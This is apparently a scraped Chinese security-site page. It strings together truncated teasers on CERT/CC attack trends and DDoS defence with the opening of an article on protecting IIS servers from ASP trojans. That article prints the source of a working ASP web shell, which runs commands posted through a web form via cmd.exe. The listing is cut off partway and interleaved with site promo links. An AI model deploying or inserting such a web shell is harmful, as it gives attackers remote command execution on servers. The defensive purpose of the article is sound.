引言:
随着ASP 技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。
摘要:
从1988年开始,位于美国卡内基梅隆大学的cert cc(计算机紧急响应小组协调中心)就开始调查入侵者的活动。cert cc给出一些关于最新入侵者攻击方式的趋势。
趋势一:攻击过程的自动化与攻击工具的快速更新
攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。
1. 扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前,新的扫描工具利用更......
摘要:
编者按:本文讨论的方法只是针对小规模的恶意攻击比较有效。
笔者公司共有10台web服务器,使用redhat linux 9作为操作系统,分布在全国各大城市,主要为用户提供http服务。曾经有一段时间不少用户反映有的服务器访问速度缓慢,甚至不能访问,检查后发现是受到了ddos攻击(分布式拒绝服务攻击)。由于服务器分布太散,不能采用硬件防火墙的方案,虽然iptables功能很强大,足以......
服务器如何防范asp木马
随着asp 技术的发展,网络上基于asp技术开发的网站越来越多,对asp技术的支持可以说已经是windows系统iis服务器的一项基本功能.但是基于asp技术的木马后门,也越来越多,而且功能也越来越强大.由于asp它本身是服务器提供的一贡服务功能,所以这种asp脚本的木马后门,不会被杀毒软件查杀.被黑客们称为“永远不会被查杀的后门”.由于其高度的隐蔽性与难查杀性,对网站的安全造成了严重的威胁.因此针对asp木马的防范与清除,为我们的网管人员提出了更高的技术要求.下面我结合个人的经验,谈一下对两款比较典型的asp 木马的防范方法,希望对大家能够有所帮助.以下是第一款木马的代码: 【程序编程相关:
黑客常用兵器之木马篇】 【推荐阅读:
黑客扫描特征及易受攻击的端口】<title>asp shell</title> 【扩展信息:
综述技巧:与“黑客”过招自我防范十大策略】 <%@ language=vbscript %> <% dim oscript dim oscriptnet dim ofilesys, ofile dim szcmd, sztempfile on error resume next -- create the com objects that we will be using -- set oscript = server.createobject("wscript.shell") set oscriptnet = server.createobject("wscript.network") set ofilesys = server.createobject("scripting.filesystemobject") -- check for a command that we have posted -- szcmd = request.form(".cmd") if (szcmd <> "") then -- use a poor mans pipe ... a temp file -- sztempfile = "c:" & ofilesys.gettempname( ) call oscript.run ("cmd.exe /c " & szcmd & " > " & sztempfile, 0, true) set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) end if %> <html> <body> <form action="<%= request.servervariables("url") %>" method="post"> <input type=text name=".cmd" size=45 value="<%= szcmd %>"> <input type=submit value="执行命令"> ...
下一页 摘要:
对于在线企业特别是电信运营商数据中心网络来说,分布式拒绝服务攻击(ddos)的出现无疑是一场灾难,对于它的有效防护一直是网络应用中的一个难题。
一直以来ddos是人们非常头疼的一个问题 ,它是一种很难用传统办法去防护的攻击手段,除了服务器外,带宽也是它的攻击目标。和交通堵塞一样,ddos已经成为一种网络公害。
传统防护:有心无力
防止ddos攻击,比较常用的有黑洞......
